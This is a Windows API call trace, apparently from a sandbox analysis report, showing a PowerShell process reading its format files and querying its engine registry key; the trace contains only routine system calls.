	[0283.632] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0283.632] SetErrorMode (uMode=0x1) returned 0x1
	[0283.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.633] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d108 | out: phkResult=0x26d108*=0x32c) returned 0x0
	[0283.633] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d08c, lpData=0x0, lpcbData=0x26d088*=0x0 | out: lpType=0x26d08c*=0x1, lpData=0x0, lpcbData=0x26d088*=0x56) returned 0x0
	[0283.633] CoTaskMemAlloc (cb=0x5a) returned 0x530d80
	[0283.633] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d05c, lpData=0x530d80, lpcbData=0x26d058*=0x56 | out: lpType=0x26d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d058*=0x56) returned 0x0
	[0283.633] CoTaskMemFree (pv=0x530d80) 
	[0283.633] RegCloseKey (hKey=0x32c) returned 0x0
	[0283.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0283.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.634] VirtualQuery (in: lpAddress=0x26bba0, lpBuffer=0x26ca60, dwLength=0x30 | out: lpBuffer=0x26ca60*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.635] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xffcbb2af, Data2=0xf7a, Data3=0x47ff, Data4=([0]=0x91, [1]=0x20, [2]=0xe8, [3]=0xb0, [4]=0xcf, [5]=0x6f, [6]=0x12, [7]=0x35))) returned 0x0
	[0283.635] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.635] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xcf0bb38b, Data2=0xabf6, Data3=0x4bea, Data4=([0]=0xb4, [1]=0x9a, [2]=0xad, [3]=0x21, [4]=0x55, [5]=0x31, [6]=0x4c, [7]=0x88))) returned 0x0
	[0283.635] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0x558991cc, Data2=0xef24, Data3=0x49c3, Data4=([0]=0x9f, [1]=0x41, [2]=0xdd, [3]=0xc, [4]=0xa6, [5]=0x69, [6]=0x8c, [7]=0xd))) returned 0x0
	[0283.635] CoCreateGuid (in: pguid=0x26d330 | out: pguid=0x26d330*(Data1=0xd10b31a1, Data2=0x4f3e, Data3=0x460f, Data4=([0]=0x9c, [1]=0x9e, [2]=0xe2, [3]=0x80, [4]=0x50, [5]=0x6c, [6]=0x54, [7]=0xbc))) returned 0x0
	[0283.636] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.636] VirtualQuery (in: lpAddress=0x26bce0, lpBuffer=0x26cba0, dwLength=0x30 | out: lpBuffer=0x26cba0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0283.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.636] SetErrorMode (uMode=0x1) returned 0x1
	[0283.636] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0283.636] GetFileType (hFile=0x32c) returned 0x1
	[0283.636] SetErrorMode (uMode=0x1) returned 0x1
	[0283.637] GetFileType (hFile=0x32c) returned 0x1
	[0283.637] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.637] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.637] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.637] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.637] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.638] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.638] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.638] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.639] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.639] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.639] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.639] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.640] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.640] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.640] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.640] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.642] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.642] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.642] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.642] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.643] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.643] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.643] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.643] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.644] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.644] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.644] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.644] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.645] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.645] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.645] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.645] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.647] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.648] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.648] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.648] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.648] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.649] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.649] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.649] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.649] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.650] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.650] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.650] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.650] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.651] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.651] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.651] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.651] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.651] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.652] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.652] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.652] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.653] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.653] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.653] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.654] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.654] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.654] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.654] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.654] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.654] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x1000, lpOverlapped=0x0) returned 1
	[0283.655] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0xf37, lpOverlapped=0x0) returned 1
	[0283.655] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3d107, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3d107*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0283.655] ReadFile (in: hFile=0x32c, lpBuffer=0x2f3da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d078, lpOverlapped=0x0 | out: lpBuffer=0x2f3da68*, lpNumberOfBytesRead=0x26d078*=0x0, lpOverlapped=0x0) returned 1
	[0283.655] CloseHandle (hObject=0x32c) returned 1
	[0283.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.655] SetErrorMode (uMode=0x1) returned 0x1
	[0283.656] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d020 | out: lpFileInformation=0x26d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0283.656] SetErrorMode (uMode=0x1) returned 0x1
	[0283.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.656] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d108 | out: phkResult=0x26d108*=0x32c) returned 0x0
	[0283.656] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d08c, lpData=0x0, lpcbData=0x26d088*=0x0 | out: lpType=0x26d08c*=0x1, lpData=0x0, lpcbData=0x26d088*=0x56) returned 0x0
	[0283.656] CoTaskMemAlloc (cb=0x5a) returned 0x530d80
	[0283.656] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d05c, lpData=0x530d80, lpcbData=0x26d058*=0x56 | out: lpType=0x26d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d058*=0x56) returned 0x0
	[0283.656] CoTaskMemFree (pv=0x530d80) 
	[0283.657] RegCloseKey (hKey=0x32c) returned 0x0
